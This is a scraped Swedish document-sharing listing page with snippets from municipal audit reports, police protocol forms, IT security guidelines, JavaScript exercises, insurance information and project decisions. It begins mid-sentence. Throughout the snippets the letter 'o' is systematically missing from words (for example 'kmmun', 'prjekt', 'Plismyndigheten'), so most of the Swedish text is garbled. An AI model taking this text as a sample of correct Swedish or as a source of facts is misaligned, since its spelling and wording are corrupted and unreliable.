skapa ett dataset. Vad man kan åstadkmma är berende på användarens rättigheter.

BILDKOLLAGE FÖLJANDE BILDER ÄR HÄMTADE FRÅN DIGITALKAMERA

BILDKOLLAGE FÖLJANDE BILDER ÄR HÄMTADE FRÅN DIGITALKAMERA Polismyndighet Enhet 5KU/F2 Familjevåldsgrupp Handläggare (Protokollförare) Inspektör Karolina Haglund Undersökningsledare Kammaråklagare Emelie Källfelt Polisens diarienummer Förtursmål Nej Ersättningsyrkanden

Läs mer

Instruktioner för mappning av individer till NY-läge

Instruktioner för mappning av individer till NY-läge PM 01-0-5 Genmförandekmmittén för nya Plismyndigheten Ju 01:16 ORG-1 Instruktiner NY-läge Instruktiner för mappning av individer till NY-läge Intrduktin Inm ramen för prjekt ORG-1 har ett förslag till

Läs mer

Tilläggsprotokoll. till 1200-K Underrättelse om utredning enligt RB 23:18 Underrättelse Yttrande Underrättelse Underrättelsesätt, misstänkt

Tilläggsprotokoll. till 1200-K Underrättelse om utredning enligt RB 23:18 Underrättelse Yttrande Underrättelse Underrättelsesätt, misstänkt Polismyndighet Tilläggsprotokoll till Arkiv/Åkl. ex Handläggare (Protokollförare) Polisassistent Anna Trulsson Undersökningsledare Kammaråklagare Anna Edebalk Polisens diarienummer Förtursmål Nej Ersättningsyrkanden

Läs mer

Verksamhetsbera ttelse 2014 Campus Alingsa s

Verksamhetsbera ttelse 2014 Campus Alingsa s Verksamhetsbera ttelse 2014 Campus Alingsa s Innehåll INLEDNING... 3 1. UTBILDNINGAR... 4 1.1 Högre utbildning... 5 1.2 Yrkeshögskla... 6 2. SAMVERKAN OCH UTVECKLING... 6 2.1 Westum... 6 2.1.1 KOBRA...

Läs mer

Kommunrevisionen: granskning av generella IT-kontroller 2014

Kommunrevisionen: granskning av generella IT-kontroller 2014 KMMUNLEDNINGSKNTRET Handläggare Ditz Catrin Nilssn Maria Datum 2015-02-03 Diarienummer KSN-2014-1679 Kmmunstyrelsen Kmmunrevisinen: granskning av generella IT-kntrller 2014 Förslag till beslut Kmmunstyrelsen

Läs mer

Riktlinjer för informationssäkerhet. ver 1.0. Antagen av Kommunstyrelsen 2013-05-29

Riktlinjer för informationssäkerhet. ver 1.0. Antagen av Kommunstyrelsen 2013-05-29 Riktlinjer för infrmatinssäkerhet ver 1.0 Antagen av Kmmunstyrelsen 2013-05-29 sid 2 (7) 1. Inledning Tanums kmmuns övergripande styrdkument inm IT-mrådet är IT-plicy för Tanums kmmun. Plicyn är antagen

Läs mer

Vetlanda kommun. Granskning av Överförmyndarverksamheten

Vetlanda kommun. Granskning av Överförmyndarverksamheten Revisinsrapprt 2013 Genmförd på uppdrag av de förtrendevalda revisrerna i Vetlanda kmmun Vetlanda kmmun Granskning av Överförmyndarverksamheten Innehåll 1. Sammanfattning...2 2. Inledning...3 2.1. Bakgrund...

Läs mer

Risk- och sårbarhetsanalys av SUNET Box för Karolinska Institutet

Risk- och sårbarhetsanalys av SUNET Box för Karolinska Institutet Risk- ch sårbarhetsanalys av SUNET Bx för Karlinska Institutet 2015-01-19 Dnr: 1-35/2015 Innehåll 1. Sammanfattning... 2 2. Bakgrund. 4 3. Nuläge..... 4 4. SUNET Bx i krthet... 5 5. Juridiska aspekter.

Läs mer

Beskrivning av Metakatalog. Sundsvalls kommun

Beskrivning av Metakatalog. Sundsvalls kommun Beskrivning av Metakatalg Sundsvalls kmmun Innehåll 1. ALLMÄNT OM METAKATALOGEN... 3 2. SYFTE... 3 2.1 AUTOMATISERING AV IT-ADMINISTRATION... 3 2.1.1 Effektivisering av IT-administratin... 4 2.2 VIDAREUTNYTTJANDE

Läs mer

Rapport delprojektgrupp HR i genomförandefasen aug 2012- jan 2014 hemsjukvårdsreformen

Rapport delprojektgrupp HR i genomförandefasen aug 2012- jan 2014 hemsjukvårdsreformen Rapprt delprjektgrupp HR i genmförandefasen aug 2012- jan 2014 hemsjukvårdsrefrmen HR gruppen HR gruppen deltagare har bestått av de fyra persnalcheferna för landstingets västra, centrala, östra länsdelar

Läs mer

Förslag till ändrade rutiner för statliga ålderspensionsavgifter

Förslag till ändrade rutiner för statliga ålderspensionsavgifter 1 (7) PM Förslag till ändrade rutiner för statliga ålderspensinsavgifter Pensinsmyndigheten föreslår att: regleringsbelppet mellan statsbudgeten ch AP-fnden för statliga ålderspensinsavgifter inte fördelas

Läs mer

Processbeskrivning fakturahantering

Processbeskrivning fakturahantering ST 2013/288-1.1 Prcessbeskrivning fakturahantering Beslutat av Charltte Byström Gäller från 2013-06-12 Innehåll Fakturahantering LNU 3 Fakturahantering 3 Prccessbeskrivning 4 Rller/ansvar 4 Arbetsmment

Läs mer

CHECKLISTA FÖR NYA MEDARBETARE VID ONKOLOGI-PATOLOGI

CHECKLISTA FÖR NYA MEDARBETARE VID ONKOLOGI-PATOLOGI 2014-09-25 CHECKLISTA FÖR NYA MEDARBETARE VID ONKOLOGI-PATOLOGI Krav för inträde till institutinen Grund för vistelse ch typ av finansiering (sida 2) Dkument till HR-enheten på Z1:00 (sida 2) Närmaste

Läs mer

Övningar i JavaScript del 3

Övningar i JavaScript del 3 Övningar i JavaScript del 3 I dessa övningar tar vi upp datumbjektet Date, arrayer ch lpar. Du utgår från ett prgram där man kan klicka på små bilder ch mtsvarande stra bild visas. Detta är i princip samma

Läs mer

Hur man skapar ett test i Test och quiz i Mondo 2.6

Hur man skapar ett test i Test och quiz i Mondo 2.6 Hur man skapar ett test i Test ch quiz i Mnd 2.6 Snabbstart Under Test ch quiz, namnge ditt test under fältet Namn ch klicka senare på Skapa. Börja sedan med att gå igenm inställningarna, för att kmma

Läs mer

Yttrande över Utredningen om genomförande av det moderniserade yrkeskvalifikationsdirektivet (SOU 2014:19)

Yttrande över Utredningen om genomförande av det moderniserade yrkeskvalifikationsdirektivet (SOU 2014:19) Staben Föredragande Magnus Hjrt Biträdande stabschef 072-713 21 03 magnus.hjrt@uhr.se YTTRANDE Diarienummer 1.2.3-3182-2013 Datum 2014-08-22 Pstadress Bx 45093 104 30 Stckhlm Besöksadress Wallingatan 2

Läs mer

Revisionsrapport 2010 Genomförd på uppdrag av revisorerna i Jönköpings kommun. Jönköpings kommun Granskning av användaradministrationen

Revisionsrapport 2010 Genomförd på uppdrag av revisorerna i Jönköpings kommun. Jönköpings kommun Granskning av användaradministrationen Revisinsrapprt 2010 Genmförd på uppdrag av revisrerna i Jönköpings kmmun Jönköpings kmmun Granskning av användaradministratinen Innehåll 1. Bakgrund ch syfte... 3 2. Metd ch avgränsning... 3 3. Begreppsförklaringar...

Läs mer

1(2) För kännedom; Fullmäktiges. presidium. uppföljning. barn- och. iakttagelser: finns. lokalt. Behov. Omorganisering. g renodlat tjänsterna

1(2) För kännedom; Fullmäktiges. presidium. uppföljning. barn- och. iakttagelser: finns. lokalt. Behov. Omorganisering. g renodlat tjänsterna SLUTDOKUMENTT 2013-03-12 1(2) För kännedm; Fullmäktiges presidium Partiernas gruppledare Kmmunstyrelsen Barn- ch utbildningsnämnden Barn- ch utbildningsnämndens verksamhet i östra kmmundelen samt uppföljning

Läs mer

SAMMANTRÄDESPROTOKOLL KOMMUNSTYRELSEN. Sammanträdesdatum 2013-10-11

SAMMANTRÄDESPROTOKOLL KOMMUNSTYRELSEN. Sammanträdesdatum 2013-10-11 fisala r;; KOMMUN SAMMANTRÄDESPROTOKOLL KOMMUNSTYRELSEN Sammanträdesdatum 2013-10-11 27 (41) 245 Dnr 2013/152 Svar på mtin m att bekämpa ungdmsbrttsligheten genm tidiga ch tydliga insatser mt unga sm begår

Läs mer

Regional samverkanskurs 2014

Regional samverkanskurs 2014 L Ä N S S T Y R E L S E N I Ö R E B R O L Ä N Reginal samverkanskurs 2014 Dnr: 455-5818-2014 1 Bakgrund Den första reginala samverkanskursen genmfördes år 1995. RSK 2014 genmfördes 6-11 nvember, den 15:nde

Läs mer

ARKIV DIGITAL - att släktforska i färg

ARKIV DIGITAL - att släktforska i färg ARKIV DIGITAL - att släktfrska i färg Av släktfrskare För släktfrskare Arkiv Digital har tillkmmit för att förverkliga en släktfrskares dröm m att kunna läsa arkivmaterial på sin datr, sm m han hade bken

Läs mer

DIGITALISERINGSPLAN 2016-2025

DIGITALISERINGSPLAN 2016-2025 Statens museer för världskultur 2015-12-21 Dnr 467/2015 DIGITALISERINGSPLAN 2016-2025 Plan för digitalisering av Världskulturmuseernas samlingar Södra vägen 54 Bx 5306, 402 27 Götebrg Telefn: 010-456 11

Läs mer

Socialkontoret, Moravägen 4, Malung, kl. 09.00-12.10

Socialkontoret, Moravägen 4, Malung, kl. 09.00-12.10 G= Malung-Sälens kmmun 1 Plats ch tid Beslutande Scialkntret, Mravägen 4, Malung, kl. 09.00-12.10 Carina Albertssn (S), rdförande Brita Shlin (M), vice rdförande Birgitta Örjas (S) Jörgen Nrén (S) Britt-Marie

Läs mer

Yttrande rörande PTS omarbetade förslag till beslut avseende grossistmarlmaden för programutsändningstjänster i marknätet.

Yttrande rörande PTS omarbetade förslag till beslut avseende grossistmarlmaden för programutsändningstjänster i marknätet. TV4-GRUPPEN Kmmunikatinsmyndigheten PTS Enheten för samtrafik Bx 5398 102 49 Stckhlm Attn: Ylva Mälarstig Stckhlm den 20 augusti 2009 Yttrande rörande PTS marbetade förslag till beslut avseende grssistmarlmaden

Läs mer

Turismutbildning 2.0

Turismutbildning 2.0 Mittuniversitetet Implementering av utbildningsstrategin Sandra Wall-Reinius 2013-03-25 Turismutbildning 2.0 Statusrapprt Innehållsförteckning Sammanfattning 1. Bakgrund 1.1 Prblemfrmulering 1.2 Prjektets

Läs mer

Riktlinjer för upphandling av konsulttjänster och entreprenader inom mark, anläggnings och byggsektorn

Riktlinjer för upphandling av konsulttjänster och entreprenader inom mark, anläggnings och byggsektorn Tekniska nämnden 2012 01 26 3 10 Tekniska nämndens arbetsutsktt 2012 01 12 13 25 Dnr 2011/937.05 Riktlinjer för upphandling av knsulttjänster ch entreprenader inm mark, anläggnings ch byggsektrn Ärendebeskrivning

Läs mer

Guide för hur bildar man en kaninhoppningsklubb ansluten till SKHRF. Även innehållande kunskap om hur man håller möten

Guide för hur bildar man en kaninhoppningsklubb ansluten till SKHRF. Även innehållande kunskap om hur man håller möten Guide för hur bildar man en kaninhppningsklubb ansluten till SKHRF Även innehållande kunskap m hur man håller möten 1 2012-12-27 Hur man bildar en kaninhppningsklubb ch sedan ansluter den till förbundet

Läs mer

~'A REGIONFÖRBUNDET JÖNKÖPINGS LÄN. Ett regionalt näri.ngslivsinrikta forskningsprogram Högskolan i Jönköping 2014-03 2017-12.

~'A REGIONFÖRBUNDET JÖNKÖPINGS LÄN. Ett regionalt näri.ngslivsinrikta forskningsprogram Högskolan i Jönköping 2014-03 2017-12. Referens Emil Hesse ~'A ~~ Beteckning R 25313 1(4) Underlag till prjektbeslut Prjektnamn: Prjektägare: År ch månad för prjektstart: År ch månad för prjektavslut: status: Ett reginalt näri.ngslivsinrikta

Läs mer

Kvalitetsgranskning av svenskundervisning för invandrare (sfi) i Stockholms stad

Kvalitetsgranskning av svenskundervisning för invandrare (sfi) i Stockholms stad SOCIALTJÄNST. OCH ARBETSMARKNADSFÖRVALTNINGEN ARBETSMARKNADSAVDELN INGEN TJÄNSTEUTLÅTANDE SID 1 (5) 2010-10-07 Handläggare: Leif Styfberg Telefn: 08 508 25 702 Till Scialtjänst- ch arbetsmarknadsnämnden

Läs mer

Information. ALLT ni BEHÖVER VETA OM SOCKGROSSISTENS försäljning. för SKOLKLASSER. Vi lämnar alltid ett års garanti på våra produkter

Information. ALLT ni BEHÖVER VETA OM SOCKGROSSISTENS försäljning. för SKOLKLASSER. Vi lämnar alltid ett års garanti på våra produkter Infrmatin ALLT ni BEHÖVER VETA OM SOCKGROSSISTENS försäljning Ett enkelt sätt att TJÄNA PENGAR för SKOLKLASSER ch FÖRENINGAR Vi lämnar alltid ett års garanti på våra prdukter VÄLKOMMEN till SOCKGROSSISTEN!

Läs mer

"~' REGIONFÖRBUNDET JÖNKÖPINGS LÄN

~' REGIONFÖRBUNDET JÖNKÖPINGS LÄN Referens Britt Wennerström, 036-102013 ~~ 0706-384158 "~' Beteckning R19013 Antal sidr 1(3) Underlag till prjektbeslut Prjektnamn: Ispiragera-Kreativa uttrycksmöjligheter för ett inkludrande samhälle Prjektägare:

Läs mer

Ny fastighetsmäklarlag. Vitec Mäklarsystem

Ny fastighetsmäklarlag. Vitec Mäklarsystem Ny fastighetsmäklarlag Vitec Mäklarsystem Juni 2011 Innehållsförteckning 1. Inledning... 2 2. Sammanfattning av den nya fastighetsmäklarlagen... 3 3. Jurnalplikten med checklistr... 4 4. Sidtjänster...

Läs mer

Scouternas stipendier till världsscoutjamboree 2015 i Japan

Scouternas stipendier till världsscoutjamboree 2015 i Japan Scuternas stipendier till världsscutjambree 2015 i Japan Scuterna har ett antal helstipendier ch ett antal delstipendier till världsscutjambreen 2015 i Japan. Man kan läsa mer m stipendierna här. För att

Läs mer

Revisionsrapport. Intern kontroll snöröjning. Vänersborgs kommun. Datum 2011-10-13. Henrik Bergh. Revisionskonsult kommunal sektor

Revisionsrapport. Intern kontroll snöröjning. Vänersborgs kommun. Datum 2011-10-13. Henrik Bergh. Revisionskonsult kommunal sektor Revisinsrapprt Intern kntrll snöröjning Vänersbrgs kmmun Datum 2011-10-13 Henrik Bergh Revisinsknsult kmmunal sektr Innehållsförteckning 1. Uppdrag ch genmförande... 3 2. Sammanfattning... 3 3. Revisinell

Läs mer

Checklista förändringsledning best practice Mongara AB

Checklista förändringsledning best practice Mongara AB Checklista förändringsledning best practice Mngara AB Detta dkument ska ses sm ett underlag för vilka frågeställningar vi jbbar med inm ramen för förändringsledning. I dkumentet har vi valt att se prcessen

Läs mer

KOMMUNIKATIONSPLAN. Digital Agenda för Västra Mälardalen samt Tillgänglighet till Hållbar IT. Revisionshistorik. Bilagor

KOMMUNIKATIONSPLAN. Digital Agenda för Västra Mälardalen samt Tillgänglighet till Hållbar IT. Revisionshistorik. Bilagor KOMMUNIKATIONSPLAN Digital Agenda för Västra Mälardalen samt Tillgänglighet till Hållbar IT Prjektägare:, Mikael Lagergren Prjektledare: Per Fröling ch Mttagare: Deltagare i prjektet ch andra intressenter.

Läs mer

ENG-A1004: Information om studierna -övning, hösten 2014

ENG-A1004: Information om studierna -övning, hösten 2014 ENG-A1004: Infrmatin m studierna -övning, hösten 2014 Cntents ENG-A1004: Infrmatin m studierna -övning, hösten 2014... 1 1. Int ch studieguiderna... 2 2. WebOdi... 3 3. Nppa... 4 4. Inside... 5 5. E-pst...

Läs mer

SchoolSoft 2015-05-05

SchoolSoft 2015-05-05 SchlSft 2015-05-05 Arkivering Nytt läsår Schemasystem: TimeEdit Nedan följer en lista på vad sm bör göras i SchlSft mellan två läsår. Berende på sklans sätt att arbeta kan det finnas mindre avvikelser

Läs mer

Remiss Miljöprogram för byggnader

Remiss Miljöprogram för byggnader 2012-08-27 Enligt Sändlista Remiss Miljöprgram för byggnader Miljö- ch stadsbyggnadsnämnden har beslutat att bifgat förslag till Miljöprgram för byggnader ska remitteras brett med målsättning att det ska

Läs mer

Vård- och omsorgsnämndens plan för funktionshinder 2016-2025

Vård- och omsorgsnämndens plan för funktionshinder 2016-2025 Vård- ch msrgsnämndens plan för funktinshinder 2016-2025 INLEDNING 3 Visin.3 Värdegrund ch nämndens mål 3 Verksamhetsidé.3 KOMMUNGEMENSAMT ARBETE.4 Eknmi 5 Jämställdhet.5 Histrik.7 Övergripande mvärldsperspektiv.8

Läs mer

SchoolSoft 2015-05-05

SchoolSoft 2015-05-05 SchlSft 2015-05-05 Arkivering Nytt läsår Schemasystem: K-Skla ch GPUntis Nedan följer en lista på vad sm bör göras i SchlSft mellan två läsår. Berende på sklans sätt att arbeta kan det finnas mindre avvikelser

Läs mer

SchoolSoft 2015-05-05

SchoolSoft 2015-05-05 SchlSft 2015-05-05 Arkivering Nytt läsår Schemasystem: Utan schemasystem, manuellt schema i SchlSft Nedan följer en lista på vad sm bör göras i SchlSft mellan två läsår. Berende på sklans sätt att arbeta

Läs mer

Övningar i JavaScript del 5

Övningar i JavaScript del 5 Övningar i JavaScript del 5 I dessa övningar ska vi ta upp några lika händelsehanterare. Dessa ska dck inte läggas in med attribut i HTML-kden, så sm vi gjrt tidigare med nclick. Istället ska vi nu lägga

Läs mer

Taxor och avgifter - Översiktlig granskning av den interna kontrollen

Taxor och avgifter - Översiktlig granskning av den interna kontrollen www.pwc.se Revisinsrapprt Taxr ch avgifter - Översiktlig granskning av den interna kntrllen Per Åke Brunström Certifierad kmmunal revisr September 2015 Innehåll Sammanfattning... 2 1. Inledning... 3 1.1.

Läs mer

BILAGA III EKONOMISKA OCH AVTALSMÄSSIGA REGLER

BILAGA III EKONOMISKA OCH AVTALSMÄSSIGA REGLER GfNA-II-B-Erasmus+_Annex III_mnbeneficiary_Versin 30-07-2014_sv.dc BILAGA III EKONOMISKA OCH AVTALSMÄSSIGA REGLER Prgrammråde 1 allmänbildande utbildning I. INLEDNING Denna bilaga kmpletterar reglerna

Läs mer

Processbeskrivning ITIL Change Management

Processbeskrivning ITIL Change Management PrcIT-P-012 Prcessbeskrivning ITIL Change Management Lednings- ch kvalitetssystem Fastställt av IT-chef/biträdande IT-chef 2014-02-06 Innehållsförteckning 1 Inledning 3 1.1 Symbler i prcessbeskrivningarna

Läs mer

SchoolSoft 2015-05-05

SchoolSoft 2015-05-05 SchlSft 2015-05-05 Arkivering Nytt läsår Schemasystem: NvaSchem (utan elever) Nedan följer en lista på vad sm bör göras i SchlSft mellan två läsår. Berende på sklans sätt att arbeta kan det finnas mindre

Läs mer

A!& REGIONFÖRBUNDET JÖNKÖPINGS LÄN. Förstudie kring LIGHTer Region Jönköping (F-LIGHT) Swerea SWECAST AB 2014-10 2015-04 Nytt

A!& REGIONFÖRBUNDET JÖNKÖPINGS LÄN. Förstudie kring LIGHTer Region Jönköping (F-LIGHT) Swerea SWECAST AB 2014-10 2015-04 Nytt Referens Karalina Brg A!& ~~ 2014-08-22 Beteckning R8214 Antal sidr 1(3) Underlag till prjektbeslut Prjektnamn: Prjektägare: År ch månad för prjektstart: Ar ch månad för prjektavslut: Status: Förstudie

Läs mer

Övningar i JavaScript del 4

Övningar i JavaScript del 4 Övningar i JavaScript del 4 I dessa övningar ska du dels hantera ett frmulär ch dels arbeta med några textsträngar. 1. Dkument i övningsmappen Övningsmappen sm du laddar ner från labratinens webbsida innehåller

Läs mer

FÖRKÖPSINFORMATION FÖR ALLRA TANDVÅRDSFÖRSÄKRING SKYDDA

FÖRKÖPSINFORMATION FÖR ALLRA TANDVÅRDSFÖRSÄKRING SKYDDA 1 FÖRKÖPSINFORMATION FÖR ALLRA TANDVÅRDSFÖRSÄKRING SKYDDA Denna förköpsinfrmatin innehåller en sammanfattning av de viktigaste villkren avseende Allras Tandvårdsförsäkring Skydda. I försäkringsbrevet,

Läs mer

Kravställ IT system på rätt sätt

Kravställ IT system på rätt sätt Kravställ IT system på rätt sätt Upphandling IT system petter.ulander@adviceu.se 070 2125800 Upphandling IT system Vad behöver vi? En mdern sprtbil? Upphandling IT system En rejäl lastbil? Upphandling

Läs mer

FÖRKÖPSINFORMATION FÖR ALLRA TANDVÅRDSFÖRSÄKRING PREMIUM

FÖRKÖPSINFORMATION FÖR ALLRA TANDVÅRDSFÖRSÄKRING PREMIUM 1 FÖRKÖPSINFORMATION FÖR ALLRA TANDVÅRDSFÖRSÄKRING PREMIUM Dna förköpsinfrmatin innehåller sammanfattning av de viktigaste villkr avsede Allras Tandvårdsförsäkring Premium. I försäkringsbrevet, ersättningstabell,

Läs mer

Plan mot diskriminering och kränkande behandling 2016

Plan mot diskriminering och kränkande behandling 2016 Södermalms stadsdelsförvaltning Sida 1 (11) Rev 2016-03-18 Plan mt diskriminering ch kränkande behandling 2016 En grundläggande mänsklig rättighet är rätten till likabehandling. Alla barn i försklan ska

Läs mer

Metod Momentet ska kontrolleras med hjälp av korstabell i Styret/ekonomisystemet.

Metod Momentet ska kontrolleras med hjälp av korstabell i Styret/ekonomisystemet. 2015-04-08 Klas Lindblm Chefscntrller, Fastighetskntret 08 560 39 Klas.Lindblm@eker.se Internkntrll 2014 - Rapprt Dnr TN14/39-017 Innehåll 1. LOU. Upphandling...1 2. Leveranskntrll...3 3. Hög arbetsbelastning.

Läs mer

Riktlinjer för Lex Sarah

Riktlinjer för Lex Sarah 2012-03-16 Sida 1 Riktlinjer för Lex Sarah Enligt SL 14 kap 2 ch LSS 24 a ska var ch en sm fullgör uppgifter inm scialtjänsten eller LSS medverka till att den verksamhet sm bedrivs ch de insatser sm genmförs

Läs mer

Intern kontroll inom Försörjningsstöd

Intern kontroll inom Försörjningsstöd Revisinsrapprt Intern kntrll inm Försörjningsstöd Inger Kullberg Cert. kmmunal revisr Anna Gröndahl Stadsrevisinen i Örebr kmmun Intern kntrll inm försörjningsstöd Innehållsförteckning 1 Sammanfattning

Läs mer

Styrelse och rektor. Revisionsrapport Upphandling. Internrevisionen Dnr LiU-2008/01363 2008-05-26 1(8) 1. Bakgrund

Styrelse och rektor. Revisionsrapport Upphandling. Internrevisionen Dnr LiU-2008/01363 2008-05-26 1(8) 1. Bakgrund Internrevisinen 1(8) Styrelse ch rektr Revisinsrapprt Upphandling 1. Bakgrund Internrevisinen (IR)har i enlighet med fastställd revisinsplan för verksamhetsåret 2008 utfört granskning av upphandling. Sedan

Läs mer

Patientsäkerhetsberättelse 2013. Stockholm Spine Center

Patientsäkerhetsberättelse 2013. Stockholm Spine Center Patientsäkerhetsberättelse 2013 Stckhlm Spine Center Innehållsförteckning SAMMANFATTNING 1 ÖVERGRIPANDE MÅL OCH STRATEGIER 2 ORGANISATORISKT ANSVAR FÖR PATIENTSÄKERHETSARBETET 3 STRUKTUR FÖR UPPFÖLJNING/UTVÄRDERING

Läs mer

Information från socialkontorets ledningsgrupp

Information från socialkontorets ledningsgrupp PROTOKOLL LEDNINGSTRÄFF 2015-10-20 Närvarande: Berit Nrén, Christina Kvarnström, Erika Hanssn, Fredrik Nilssn, Inger Engström, Lena Sjölin, Peder Hanssn, Sture Veräjä, Åsa Israelssn, Eva Åkerlund Infrmatin

Läs mer

Designprocessdagbok. Grupp 3; Maria Törnkvist, Ida Gustafsson, Mikael Karlsson, Jonas Lind, Hanne Flink- Sundin.

Designprocessdagbok. Grupp 3; Maria Törnkvist, Ida Gustafsson, Mikael Karlsson, Jonas Lind, Hanne Flink- Sundin. Designprcessdagbk. Grupp 3; Maria Törnkvist, Ida Gustafssn, Mikael Karlssn, Jnas Lind, Hanne Flink- Sundin. Krt intrduktin Under hela vår designprcess har vi fört dagbk över våra möten, dagbken har vi

Läs mer

Anslagshandbok för Stiftelsen Skogssällskapet och närstående stiftelser Ansökan, granskning och kommunikation, utlysningsår 2015

Anslagshandbok för Stiftelsen Skogssällskapet och närstående stiftelser Ansökan, granskning och kommunikation, utlysningsår 2015 Läs m Stiftelsen Skgssällskapets ch närstående stiftelsers anslag för frskning ch kunskapsutveckling, kmmunikatin ch kunskapsspridning; m ansökan, granskning av ansökningar ch kmmunikatin kpplad till prjekten.

Läs mer

Riktlinjer för externfinansierade forskningsprojekt vid Högskolan i Skövde

Riktlinjer för externfinansierade forskningsprojekt vid Högskolan i Skövde Rektr BESLUT 2015-03-17 Dnr HS Riktlinjer för externfinansierade frskningsprjekt vid Högsklan i Skövde Eknmiavdelningen vid Högsklan i Skövde har riktlinjer för externfinansierade frskningsprjekt. Dkumentet

Läs mer

KAN MAN KÖPA GRISEN I SÄCKEN PÅ INTERNET?

KAN MAN KÖPA GRISEN I SÄCKEN PÅ INTERNET? SVENSK T!DSKRIFT KAN MAN KÖPA GRISEN I SÄCKEN PÅ INTERNET? MAGNUS NILSSON Tillgängligheten ökar, det blir billigare ch kunderna krnmer i högre utsträckning att styras av varumärken ch ställa högre krav

Läs mer

GÖTEBORGS STADSKANSLI Koncernledningsstaben 2002-03-20 Livslångt lärande Lill Backlund/ Karin Asplund Tel: 031 61 11 68, 031 778 69 21

GÖTEBORGS STADSKANSLI Koncernledningsstaben 2002-03-20 Livslångt lärande Lill Backlund/ Karin Asplund Tel: 031 61 11 68, 031 778 69 21 GÖTEBORGS STADSKANSLI RAPPORT Kncernledningsstaben 2002-03-20 Livslångt lärande Lill Backlund/ Karin Asplund Tel: 031 61 11 68, 031 778 69 21 Översyn av rganisatinen för studie- ch yrkesvägledning samt

Läs mer

Resultat Söderskolan åk 8 våren 2015

Resultat Söderskolan åk 8 våren 2015 Datum 2015-04-09 Nrum/Westerman-Annerbrn KUN2015/111 Resultat Södersklan åk 8 våren 2015 2013 79 svarande av 97 elever, 41 flickr ch 38 pjkar, (enligt Prcapita 6/2) dvs 81 % 2014 90 svarande av 123 elever(enligt

Läs mer

YH och internationalisering

YH och internationalisering YH ch internatinalisering Myndigheten för yrkeshögsklan ISBN-nr: 978-91-87073-25-0 Dnr: MYH 2015/140 Omslagsbild: Bildarkivet 1 (10) Datum: 2014-12-16 Dnr: MYH 2015/140 Rapprt Yrkeshögsklan ch internatinalisering

Läs mer

ABB Sverige har fattat beslut om att samtliga entreprenörer och konsulter skall certifieras i arbetsmiljöoch säkerhet

ABB Sverige har fattat beslut om att samtliga entreprenörer och konsulter skall certifieras i arbetsmiljöoch säkerhet ABB Sverige har fattat beslut m att samtliga entreprenörer ch knsulter skall certifieras i arbetsmiljöch säkerhet Genmförd SSG Entré är en förutsättning för att arbeta åt ABB. Bakgrund Brister i arbetsmiljökmpetens

Läs mer

Slutrapport Uppdragsutbildning ITM

Slutrapport Uppdragsutbildning ITM Slutrapprt Uppdragsutbildning ITM Upprättad av: Martina Granhlm, ADV Dkumentansvarig: Datum: Larsa Nicklassn, ADV 2013-04-226 Slutrapprt Uppdragsutbildning ITM 1 Bakgrund 3 1.1 Prblemfrmulering 3 1.2 Prjektets

Läs mer

Brf Herden 8 www.brfherden.se www.sbc.se/herden8

Brf Herden 8 www.brfherden.se www.sbc.se/herden8 Infrmatin till alla hyresgäster ch bstadsrättsinnehavare Oktber 2013 Innehåll Balkngerna en lägesrapprt Källarrensning cntainer på gården helgen 9-10 nvember Kallt i lägenheten Cyklar Inget 20-årsjubileum

Läs mer

Exempel på hur Din tandvårdsförsäkring fungerar

Exempel på hur Din tandvårdsförsäkring fungerar 1 FÖRKÖPSINFORMATION FÖR ALLRA TANDVÅRDSFÖRSÄKRING VÅRDA Dna förköpsinfrmatin innehåller sammanfattning av de viktigaste villkr avsede Allras Tandvårdsförsäkring Vårda. I försäkringsbrevet, stabell, de

Läs mer

Sätra skolas kvalitetsredovisning 2014-2015

Sätra skolas kvalitetsredovisning 2014-2015 Grundskla Handläggare Vårt diarienummer Datum Sidan 1(12) 2015-06-03 Sätra sklas kvalitetsredvisning 2014-2015 1. Organisatin Sätra skla är en F-6 skla ch har under läsåret 2014-2015 haft 169 elever. Dessa

Läs mer

Vad är direktivet/eidas? en beskrivning av en teknisk maskin, en nationell PKI betroddhetsserver

Vad är direktivet/eidas? en beskrivning av en teknisk maskin, en nationell PKI betroddhetsserver Jan Bergström 2015-08-29 S:t Eriksgatan 48 112 34 Stckhlm 08-6505553 070-7559494 (GSM) janbm70@gmail.cm Näringsdepartementet Remissvar eidas Vad är direktivet/eidas? en beskrivning av en teknisk maskin,

Läs mer

Genombrottsprogram IV, Bättre vård Mindre tvång

Genombrottsprogram IV, Bättre vård Mindre tvång Prjektrapprt Genmbrttsprgram IV, Bättre vård Mindre tvång Team 68 Avdelning 90 ch akutmttagningen, Säters Sjukhus, Allmänpsykiatriska kliniken Falun ch Säter, Landstinget Dalarna. Deltagande team Ann-Chaltte

Läs mer

FU 2000 Generella arbetsmiljökrav

FU 2000 Generella arbetsmiljökrav Systemmdell FU 2000 Handling 7.4 Giltig från Versinsnummer Antal sidr 2010-03-31 Utgåva J 7 Diarienummer Utgivningsdatum Antal bilagr F10-2409/PE50 2010-03-31 0 Beslutsfattare CGD Stab Persnal Handläggande

Läs mer

AppGate och Krisberedskapsmyndighetens basnivå för informationssäkerhet, BITS

AppGate och Krisberedskapsmyndighetens basnivå för informationssäkerhet, BITS AppGate ch Krisberedskapsmyndighetens basnivå för infrmatinssäkerhet, BITS En intrduktin i säkerhet. AppGate AppGate är ett svenskt säkerhetsföretag med sina rötter inm försvarsindustrin. AppGates teknik

Läs mer

Revisionsrapport. Investeringar. Katrineholms kommun. Annika Hansson, Cert kommunal revisor Jukka Törrö November 2011

Revisionsrapport. Investeringar. Katrineholms kommun. Annika Hansson, Cert kommunal revisor Jukka Törrö November 2011 Revisinsrapprt Investeringar granskning med utgångspunkt i gd eknmisk hushållning Katrinehlms kmmun Annika Hanssn, Cert kmmunal revisr Jukka Törrö Nvember 2011 Innehållsförteckning 1 Sammanfattning ch

Läs mer

Östervåla 2015-06-11

Östervåla 2015-06-11 Östervåla 2015-06-11 Vårens sista styrelsemöte avhölls igår nsdag så vi i styrelsen har samlat lite inf m vad sm händer ch vill med det önska Er alla en skön smmar. Infrmatin från Östervåla IF:s styrelse.

Läs mer

Uppföljning av sommar 2015 Annika Sörensdotter

Uppföljning av sommar 2015 Annika Sörensdotter Uppföljning av smmar 2015 Annika Sörensdtter Lönekntr Annika Sörensdtter Rapprt Uppföljning av smmar 2015 2(19) Innehållsförteckning Original lagras ch gdkänns elektrniskt. Utskrifter gäller endast efter

Läs mer

Övningar i JavaScript del 7

Övningar i JavaScript del 7 Övningar i JavaScript del 7 I denna labratin återanvänder vi bilderna på frukter, sm vi haft i ett par tidigare labratiner. Denna gång ska vi lägga till visuella effekter då en frukt väljs. Klickar man

Läs mer

Manus till presentationen. Vaccination mot HPV. Version 2015-03-31

